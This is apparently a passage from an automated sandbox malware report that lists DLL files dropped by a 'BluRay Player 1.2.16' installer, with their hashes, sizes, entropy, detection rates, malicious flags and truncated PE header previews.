SHA1:	5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
SHA-256:	C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
SHA-512:	EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................\|....................................................................................text...4\|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..\|...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LIOS8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	291245
Entropy (8bit):	6.234245376773595
Encrypted:	false
SSDEEP:	6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
MD5:	2D8A0BC588118AA2A63EED7BF6DFC8C5
SHA1:	7FB318DC21768CD62C0614D7AD773CCFB7D6C893
SHA-256:	707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
SHA-512:	A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-M38NA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	814068
Entropy (8bit):	6.5113626552096
Encrypted:	false
SSDEEP:	24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
MD5:	5B1EB4B36F189362DEF93BF3E37354CC
SHA1:	8C0A4992A6180D0256ABF669DFDEE228F03300BA
SHA-256:	D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
SHA-512:	BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-N39PE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	268404
Entropy (8bit):	6.265024248848175
Encrypted:	false
SSDEEP:	3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
MD5:	C4C23388109D8A9CC2B87D984A1F09B8
SHA1:	74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
SHA-256:	11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
SHA-512:	060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............\|..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-NT9JC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	248781
Entropy (8bit):	6.474165596279956
Encrypted:	false
SSDEEP:	3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
MD5:	C4002F9E4234DFB5DBE64C8D2C9C2F09
SHA1:	5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
SHA-256:	F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
SHA-512:	4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-OJPOO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	165739
Entropy (8bit):	6.062324507479428
Encrypted:	false
SSDEEP:	3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
MD5:	E2F18B37BC3D02CDE2E5C15D93E38418
SHA1:	1A6C58F4A50269D3DB8C86D94B508A1919841279
SHA-256:	7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
SHA-512:	61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-RUKE1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	65181
Entropy (8bit):	6.085572761520829
Encrypted:	false
SSDEEP:	768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
MD5:	98A49CC8AE2D608C6E377E95833C569B
SHA1:	BA001D8595AC846D9736A8A7D9161828615C135A
SHA-256:	213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
SHA-512:	C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-S71CN.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	64724
Entropy (8bit):	5.910307743399971
Encrypted:	false
SSDEEP:	768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
MD5:	7AF455ADEA234DEA33B2A65B715BF683
SHA1:	F9311CB03DCF50657D160D89C66998B9BB1F40BA
SHA-256:	6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
SHA-512:	B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-T38SK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	101544
Entropy (8bit):	6.237382830377451
Encrypted:	false
SSDEEP:	1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
MD5:	E13FCD8FB16E483E4DE47A036687D904
SHA1:	A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
SHA-256:	0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
SHA-512:	38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......... ...,..................@.0@.bss.........P........................`..edata..-....`.....................@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-TQ33C.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26562
Entropy (8bit):	5.606958768500933
Encrypted:	false
SSDEEP:	768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
MD5:	E9C7068B3A10C09A283259AA1B5D86F2
SHA1:	3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
SHA-256:	06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
SHA-512:	AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgcc_s_dw2-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	121524
Entropy (8bit):	6.347995296737745
Encrypted:	false
SSDEEP:	1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
MD5:	6CE25FB0302F133CC244889C360A6541
SHA1:	352892DD270135AF5A79322C3B08F46298B6E79C
SHA-256:	E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
SHA-512:	3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk-win32-2.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	814068
Entropy (8bit):	6.5113626552096
Encrypted:	false
SSDEEP:	24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
MD5:	5B1EB4B36F189362DEF93BF3E37354CC
SHA1:	8C0A4992A6180D0256ABF669DFDEE228F03300BA
SHA-256:	D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
SHA-512:	BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk_pixbuf-2.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	181527
Entropy (8bit):	6.362061002967905
Encrypted:	false
SSDEEP:	3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
MD5:	0D0D311D1837705B1EAFBC5A85A695BD
SHA1:	AA7FA3EB181CC5E5B0AA240892156A1646B45184
SHA-256:	AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
SHA-512:	14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............\|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdkmm-2.4-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	268404
Entropy (8bit):	6.265024248848175
Encrypted:	false
SSDEEP:	3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
MD5:	C4C23388109D8A9CC2B87D984A1F09B8
SHA1:	74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
SHA-256:	11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
SHA-512:	060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............\|..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libglibmm-2.4-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	463112
Entropy (8bit):	6.363613724826455
Encrypted:	false
SSDEEP:	12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
MD5:	D9D9C79E35945FCA3F9D9A49378226E7
SHA1:	4544A47D5B9765E5717273AAFF62724DF643F8F6
SHA-256:	18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
SHA-512:	B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgmodule-2.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26562
Entropy (8bit):	5.606958768500933
Encrypted:	false
SSDEEP:	768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
MD5:	E9C7068B3A10C09A283259AA1B5D86F2
SHA1:	3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
SHA-256:	06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
SHA-512:	AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgobject-2.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	337171
Entropy (8bit):	6.46334441651647
Encrypted:	false
SSDEEP:	3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
MD5:	51D62C9C7D56F2EF2F0F628B8FC249AD
SHA1:	33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
SHA-256:	FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
SHA-512:	03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgomp-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	174543
Entropy (8bit):	6.3532700320638025
Encrypted:	false
SSDEEP:	3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
MD5:	65D8CB2733295758E5328E5A3E1AFF15
SHA1:	F2378928BB9CCFBA566EC574E501F6A82A833143
SHA-256:	E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
SHA-512:	BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgraphite2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	235032
Entropy (8bit):	6.398850087061798
Encrypted:	false
SSDEEP:	6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
MD5:	E1D0ACD1243F9E59491DC115F4E379A4
SHA1:	5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
SHA-256:	FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
SHA-512:	392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libharfbuzz-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	441975
Entropy (8bit):	6.372283713065844
Encrypted:	false
SSDEEP:	6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
MD5:	6CD78C8ADD1CFC7CBB85E2B971FCC764
SHA1:	5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
SHA-256:	C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
SHA-512:	EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................\|....................................................................................text...4\|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..\|...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libintl-8.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	140752
Entropy (8bit):	6.52778891175594
Encrypted:	false
SSDEEP:	3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
MD5:	A8F646EB087F06F5AEBC2539EB14C14D
SHA1:	4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
SHA-256:	A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
SHA-512:	93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
Malicious:	true
